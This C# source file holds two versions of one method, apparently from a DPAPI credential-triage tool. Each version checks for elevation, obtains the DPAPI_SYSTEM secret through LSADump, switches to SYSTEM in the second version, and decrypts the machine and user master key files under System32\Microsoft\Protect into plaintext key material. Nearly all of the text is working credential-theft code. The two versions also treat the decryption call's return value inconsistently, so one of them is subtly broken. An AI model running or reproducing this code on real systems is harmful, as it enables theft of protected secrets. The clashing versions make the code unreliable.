/// <summary>
/// Reads the SYSTEM DPAPI master key files under
/// <c>%SystemDrive%\Windows\System32\Microsoft\Protect\</c> and passes each one to
/// <c>Dpapi.DecryptMasterKeyWithSha</c> together with a key from <c>LSADump.GetDPAPIKeys</c>.
/// </summary>
/// <param name="show">When true, prints the path of every master key file that is processed.</param>
/// <returns>
/// Every entry returned by <c>Dpapi.DecryptMasterKeyWithSha</c>, merged into one dictionary.
/// The dictionary is empty when the caller is not high integrity. The values are presumably
/// decrypted key material (TODO confirm against Dpapi) and should be handled as secrets.
/// </returns>
/// <remarks>
/// This method touches two places: whatever <c>LSADump.GetDPAPIKeys</c> reads (the DPAPI_SYSTEM
/// secret, per the original comment) and the Protect directory tree. Both accesses are
/// visible to host auditing.
/// </remarks>
public static Dictionary<string, string> TriageSystemMasterKeys(bool show = false)
{
    // Master key files are named with a GUID. The pattern is unanchored and is applied to the
    // full path, so a GUID-shaped run anywhere in the path qualifies.
    const string guidPattern = @"[0-9A-Fa-f]{8}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{12}";

    Dictionary<string, string> mappings = new Dictionary<string, string>();

    if (!Helpers.IsHighIntegrity())
    {
        Console.WriteLine("\r\n[X] Must be elevated to triage SYSTEM masterkeys!\r\n");
        return mappings;
    }

    // Index 0 is used as the "machine" key and index 1 as the "user" key.
    List<byte[]> dpapiKeys = LSADump.GetDPAPIKeys(true);

    string protectRoot = String.Format("{0}\\Windows\\System32\\Microsoft\\Protect\\", Environment.GetEnvironmentVariable("SystemDrive"));

    foreach (string protectDir in Directory.GetDirectories(protectRoot))
    {
        string[] machineFiles = Directory.GetFiles(protectDir);

        // The User\ subfolder is optional, so fall back to an empty list when it is absent.
        string userDir = String.Format("{0}\\User\\", protectDir);
        string[] userFiles = Directory.Exists(userDir) ? Directory.GetFiles(userDir) : new string[0];

        foreach (string path in machineFiles)
        {
            if (!Regex.IsMatch(path, guidPattern))
            {
                continue;
            }

            // NOTE(review): computed but never read in this method.
            string leafName = System.IO.Path.GetFileName(path);

            if (show)
            {
                Console.WriteLine("[*] Found SYSTEM system MasterKey : {0}", path);
            }

            byte[] masterKeyBlob = File.ReadAllBytes(path);

            try
            {
                // use the "machine" DPAPI key
                Dictionary<string, string> decrypted = Dpapi.DecryptMasterKeyWithSha(masterKeyBlob, dpapiKeys[0]);
                foreach (KeyValuePair<string, string> entry in decrypted.ToList())
                {
                    // Add throws on a duplicate key; the catch below reports that against this file.
                    mappings.Add(entry.Key, entry.Value);
                }
            }
            catch (Exception e)
            {
                // Best effort: report the failure and continue with the next file.
                Console.WriteLine("[X] Error triaging {0} : {1}", path, e.Message);
            }
        }

        foreach (string path in userFiles)
        {
            if (!Regex.IsMatch(path, guidPattern))
            {
                continue;
            }

            // NOTE(review): computed but never read in this method.
            string leafName = System.IO.Path.GetFileName(path);

            if (show)
            {
                Console.WriteLine("[*] Found SYSTEM user MasterKey : {0}", path);
            }

            byte[] masterKeyBlob = File.ReadAllBytes(path);

            try
            {
                // use the "user" DPAPI key
                Dictionary<string, string> decrypted = Dpapi.DecryptMasterKeyWithSha(masterKeyBlob, dpapiKeys[1]);
                foreach (KeyValuePair<string, string> entry in decrypted.ToList())
                {
                    mappings.Add(entry.Key, entry.Value);
                }
            }
            catch (Exception e)
            {
                Console.WriteLine("[X] Error triaging {0} : {1}", path, e.Message);
            }
        }
    }

    return mappings;
}
/// <summary>
/// Reads the SYSTEM DPAPI master key files under
/// <c>%SystemDrive%\Windows\System32\Microsoft\Protect\</c> and passes each one to
/// <c>Dpapi.DecryptMasterKeyWithSha</c> together with a key from <c>LSADump.GetDPAPIKeys</c>.
/// </summary>
/// <param name="show">When true, prints the path of every master key file that is processed.</param>
/// <returns>
/// One entry per master key file that decrypted and added without error. The dictionary is
/// empty when the caller is not high integrity. The values are presumably decrypted key
/// material (TODO confirm against Dpapi) and should be handled as secrets.
/// </returns>
/// <remarks>
/// This method touches two places: whatever <c>LSADump.GetDPAPIKeys</c> reads (the DPAPI_SYSTEM
/// secret, per the original comment) and the Protect directory tree. Both accesses are
/// visible to host auditing.
/// </remarks>
public static Dictionary<string, string> TriageSystemMasterKeys(bool show = false)
{
    // IsMatch is unanchored: the pattern needs a backslash directly before the GUID, but
    // text after the GUID is still accepted.
    const string masterKeyPathPattern = @".*\\[0-9A-Fa-f]{8}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{12}";

    var mappings = new Dictionary<string, string>();

    if (!Helpers.IsHighIntegrity())
    {
        Console.WriteLine("\r\n[X] Must be elevated to triage SYSTEM masterkeys!\r\n");
        return mappings;
    }

    // Index 0 is used as the "machine" key and index 1 as the "user" key.
    var dpapiKeys = LSADump.GetDPAPIKeys(true);

    // NOTE(review): presumably switches the current context to SYSTEM so the Protect folder
    // can be read. No matching revert is visible in this method; confirm where it is undone.
    Helpers.GetSystem();

    var protectRoot = $"{Environment.GetEnvironmentVariable("SystemDrive")}\\Windows\\System32\\Microsoft\\Protect\\";

    foreach (var protectDir in Directory.GetDirectories(protectRoot))
    {
        var machineFiles = Directory.GetFiles(protectDir);

        // The User\ subfolder is optional, so fall back to an empty list when it is absent.
        var userDir = $"{protectDir}\\User\\";
        var userFiles = Directory.Exists(userDir) ? Directory.GetFiles(userDir) : new string[0];

        // The machine and user passes differ only in which key is used and which banner is
        // printed. Machine files are always processed before user files.
        var passes = new[]
        {
            // use the "machine" DPAPI key
            new { Files = machineFiles, KeyIndex = 0, Banner = "[*] Found SYSTEM system MasterKey : {0}" },
            // use the "user" DPAPI key
            new { Files = userFiles, KeyIndex = 1, Banner = "[*] Found SYSTEM user MasterKey : {0}" },
        };

        foreach (var pass in passes)
        {
            foreach (var path in pass.Files)
            {
                if (!Regex.IsMatch(path, masterKeyPathPattern))
                {
                    continue;
                }

                // NOTE(review): computed but never read in this method.
                var leafName = Path.GetFileName(path);

                if (show)
                {
                    Console.WriteLine(pass.Banner, path);
                }

                var masterKeyBlob = File.ReadAllBytes(path);

                try
                {
                    var plaintextMasterKey = Dpapi.DecryptMasterKeyWithSha(masterKeyBlob, dpapiKeys[pass.KeyIndex]);

                    // Add throws on a duplicate key; the catch below reports that against this file.
                    mappings.Add(plaintextMasterKey.Key, plaintextMasterKey.Value);
                }
                catch (Exception e)
                {
                    // Best effort: report the failure and continue with the next file.
                    Console.WriteLine("[X] Error triaging {0} : {1}", path, e.Message);
                }
            }
        }
    }

    return mappings;
}